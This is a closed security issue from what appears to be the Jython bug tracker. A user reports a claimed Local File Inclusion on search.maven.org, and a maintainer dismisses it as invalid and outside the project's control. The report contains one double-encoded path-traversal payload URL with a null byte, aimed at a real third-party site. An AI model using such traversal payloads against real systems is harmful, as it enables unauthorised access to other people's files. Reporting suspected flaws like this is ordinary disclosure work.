Issue2782

classification

Title:	with Local File Inclusion getting directories and files
Type:	security	Severity:	critical
Components:	website	Versions:
		Milestone:

process

Status:	closed	Resolution:	invalid
Dependencies:		Superseder:
Assigned To:		Nosy List:	forsa41, jeff.allen
Priority:		Keywords:

Created on 2019-07-01.08:24:13 by forsa41, last changed 2019-07-06.16:24:32 by jeff.allen.

Files
File name	Uploaded	Description	Edit	Remove
Screenshot from 2019-07-01 11-08-30.jpg	forsa41, 2019-07-01.08:24:13

Messages
msg12570 (view)	Author: Tugcan Ozel (forsa41)	Date: 2019-07-01.08:24:13
while I download jython 2.7 for my burp plugin i see filepath paramater in GET requests and I tried LFI payload and i get picture that in attachments payload descp: double encoding and null paramater payload:https://search.maven.org/remotecontent?filepath=%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
msg12572 (view)	Author: Jeff Allen (jeff.allen)	Date: 2019-07-06.16:24:31
Thanks, but these are directories on maven.org, which we don't control. FWIW I think it is intentional. See also #2681.

History
Date	User	Action	Args
2019-07-06 16:24:32	jeff.allen	set	status: open -> closed resolution: invalid messages: + msg12572 nosy: + jeff.allen
2019-07-03 10:20:06	forsa41	set	title: LFI -> with Local File Inclusion getting directories and files
2019-07-01 08:24:13	forsa41	create